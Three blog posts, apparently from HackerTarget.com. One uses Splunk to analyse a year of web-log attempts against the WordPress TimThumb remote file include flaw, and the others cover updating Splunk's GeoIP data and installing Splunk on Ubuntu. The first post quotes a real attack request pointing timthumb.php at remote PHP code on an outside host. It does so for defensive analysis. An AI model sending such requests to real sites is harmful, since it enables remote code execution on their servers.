Back in August 2011, a serious vulnerability was discovered in many popular WordPress themes and Plugins. The code enabled automatic thumbnail creation when publishing with the WordPress content management system. While not a part of the WordPress core, the code had been reused by many developers, including both commercial and free theme builders.

The critical vulnerability is a remote file include (RFI) which allows an attacker to have the thumb.php code include additional code to execute PHP on the web server. An attacker attempts to use this vulnerability to execute commands on the web server.

So widespread was the vulnerability that attackers have been compromising WordPress installations for the past 18 months and continue to do so. Just yesterday, my OSSEC host-based intrusion detection system alerted me to continued attempts at exploiting the timthumb vulnerability.

Example

Below is an attack example from my logs. Note the WordPress path being attempted, the theme name, and the ?src= is the URL of the remote include PHP code.

61.246.x.x - - [02/Feb/2013:18:33:28 +0000] "GET /wordpress-themes-in-top-1-million-websites/wp-content/themes/suffusion/timthumb.php?src=http://picasa.com.c        t.ro/wordpress.php HTTP/1.1" 404 36 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"

Anyone who has patched the vulnerability with updated code is not affected by these ongoing attempted attacks. They simply fill your web server log files with attempts to execute thumb.php on various common paths resulting in 404 not found errors.

What is Splunk?

If your job involves looking at logs, spend some cycles playing with the Splunk Search engine. It is a commercial product but comes in a free version that allows you to consume 500mb of logs per day. Great for performing ad-hoc analysis or small to mid-size projects.

To perform some simple analysis of my web server logs to view the frequency, sources and attempts to exploit this timthumb vulnerability, I have turned to Splunk.

Feeding Splunk a year of Timthumb Attacks

Timthumb Events per month over 1 year

To begin, I installed Splunk and fed it a single file. The file contained 12 months worth of logs from my Nginx web server. I used grep to only feed log entries that included thumb in the path and resulted in a 404 not found. In other words, every log event that I have in my Splunk instance is a single attempt to exploit the timthumb vulnerability.

Since the data in my Splunk instance is only made up of timthumb exploit attempts, the initial search string shows all the attempts per month over the 12 months.

source="/home/fred/nginx-logs/access-complete-thumb.txt"

It is clear from this simple query that even though the initial vulnerability was released in August 2011, there was a major jump in the number of attacks against my server from July 2012. The reason for the increased number of attempts appears to be an increase in the tested paths of the timthumb code (more known bad themes). These lists are then included in the attack scripts.

Where did the attacks come from?

Using the Splunk GeoIP APP it is a simple matter to determine where the attacks are coming from. Once you have the base lookup working, Splunk makes it easy to chart the results of the top countries or cities.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | lookup geoip clientip | top 20 client_country

This query shows the Top 20 countries for total number of attacks.

Since some of these IP addresses are sending thousands of attempts, I take a closer look at the number of unique IP addresses by location. Instead of a simple chart, I use the Google Map APP that allows the geolocations to be plotted onto a Google Map. Using a map takes this visualization to the next level. A great way to impress the boss with a couple of clicks!!

From a quick look at the map it is apparent that there are no timthumb hackers in Mongolia.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | stats count by clientip | geoip clientip

Top attacking IP Addresses

Piping the search into top 20 clientip shows the top attacking IP address as 178.25.214.92 with 2445 events. Click on the IP address and it easy to see all attempts from this IP occurred during an 8 minute window on the 30th of August 2012. Whois shows this IP address is a broadband connection in Germany.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | top 20 clientip

source="/home/fred/nginx-logs/access-complete-thumb.txt" clientip="178.25.214.92"

Most Attacked WordPress Themes

To extract the most popular themes that are being attacked I used a regex on /wp-content/themes/ to get the theme path. Many of the attacked themes in the top 20 correlate with the most popular WordPress themes in the Top 1 million websites.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | rex field=_raw "wp-content\/themes\/(?[\w\-]*)" | top 20 wptheme

Looking at the most attacked WordPress themes, I discovered some attacks were not "blind" attempts. They were targeted against my theme that I have on a non-standard path. This indicates my site was explicitly targeted either manually after extraction of the path from the HTML source of my page or by a script parsing the HTML for those attempts. 31 different IP addresses had a go at my non-default theme path. In the top 5, I found 3 web hosting net blocks (Sweden, Germany and the USA), a Greek university and two Tor exit nodes.

source="/home/fred/nginx-logs/access-complete-thumb.txt" uri_path="/wp-content/themes/delegate2.3/functions/thumb.php" | top clientip

I have only scratched the surface of what is possible when using Splunk to analyse your web logs for attacks and other issues. Install it, start playing, and you will not be disappointed. For those who are wary of the Splunk price tag for larger amounts of data, I suggest taking a look at ELSA and GreyLog2. Both are open source log management systems that seem promising and are developing rapidly.

The post There are no WordPress Timthumb Hackers in Mongolia appeared first on HackerTarget.com.

Head over to the MaxMind website and grab the latest version of the GeoLiteCity.dat.gz file.

Download: http://dev.maxmind.com/geoip/geolite

Now uncompress the download with gzip.

gzip -d GeoLiteCity.dat.gz

If you take a look in /opt/splunk/etc/apps/maps/bin/ of your Splunk install you will see the version of the GeoLiteCity.dat file is August 20, 2011. Time to update it to the latest version.

cp GeoLiteCity.dat /opt/splunk/etc/apps/maps/bin/

Start searching Splunk with the latest GeoIP data from MaxMind. It really is that easy.

The post Update GeoIP data for Splunk App appeared first on HackerTarget.com.

One of the great features of Splunk is that you can feed pretty much any log into it and start searching. Here at hackertarget.com we usually focus on Open Source Security projects; Splunk is not open source, it is commercial however it does have a Free option that allows up to 500mb of data to be added into the system per day. For larger volume than 500mb per day, the licensing costs start to add up. Splunk installation under Ubuntu is so easy, you can fire up an instance to do ad-hoc analysis of static log files.

Open Source Splunk Alternative

If you are interested in a purely Open Source log search engine, take a look at ELSA - Enterprise Log Search and Archive. This is a relatively new project that is making good progress. It has been included on the latest Security Onion release.

Another Open Source log management option is Graylog2. I am yet to test or explore this alternative to Splunk but I have read some good reviews and it looks promising.

Download Splunk for Ubuntu

Splunk runs on a wide range of computing platforms including Windows, Linux, FreeBSD, OSX, Solaris, AIX and even HPUX.

http://www.splunk.com/download?r=header

We are after the Linux download option, specifically the .deb file as Ubuntu uses the Debian based .deb package format for binary installs. It is a matter of selecting either 32bit or 64bit and then downloading the .deb file.

Not sure whether your Ubuntu is 32bit or 64bit? The easiest way to check this is to use a Unix command uname -a in a terminal window. Bring up a terminal window and type in that command. x64 indicates 64bit while i686 i386 indicates a 32 bit install.

The 32 bit package is about 35.5mb, you will need to signup for a Splunk account to begin the download. It is worth creating an account you will remember as this same acocunt will be used to download additional plugins (apps) from the Splunk site.

Once the download is complete you can install it with the following dpkg command as seen in the output below:

fred@x-wing1:~$ sudo dpkg -i Downloads/splunk-5.0.1-143156-linux-2.6-intel.deb 
[sudo] password for fred: 
Selecting previously unselected package splunk.
(Reading database ... 239507 files and directories currently installed.)
Unpacking splunk (from .../splunk-5.0.1-143156-linux-2.6-intel.deb) ...
Setting up splunk (5.0.1-143156) ...
----------------------------------------------------------------------
Splunk has been installed in:
        /opt/splunk

To start Splunk, run the command:
        /opt/splunk/bin/splunk start


To use the Splunk Web interface, point your browser at:
    http://x-wing1:8000


Complete documentation is at http://docs.splunk.com/Documentation/Splunk
----------------------------------------------------------------------

Yes it is that easy, no dependencies or mucking around. Now its time to start the Splunk server.

sudo /opt/splunk/bin/splunk start

After some initial setup, you should see:

The Splunk web interface is at http://x-wing1:8000

Login and change your password. You now have your very own Splunk server, just like the cool kids.

Feed Splunk Data and Search!

Start getting data in the system and then you can search on that data. Data can be input from simple files for some one off analysis, it can read known log files or can listen on a port similar to a syslog server. It is very flexible, for example running it on a TCP port you could even use netcat to pipe a file over the network into Splunk server, or have a syslog server forward some of its logs to the Splunk instance. This would leave you with your existing syslog infrastructure intact for archival purposes but you also have the Splunk instance for easy analysis.

Now you are up to the point where it depends on your network and requirements, so think about how you are going to use it, feed it some data and start searching for stuff. The stuff could be configuration issues, errors, utilization trends or security events. If you want to do some easy testing, just grab a web server log file or other log and feed it in directly with the a file or directory option.

This video is a good introduction to performing Splunk log searches and pulling relevant information from your data.

While I suspect most people will find value from the first day, as you explore the capabilities of the Splunk search engine you will find stuff - its a rabbit hole for systems administrators.

The post Install Splunk on Ubuntu in 5 mins appeared first on HackerTarget.com.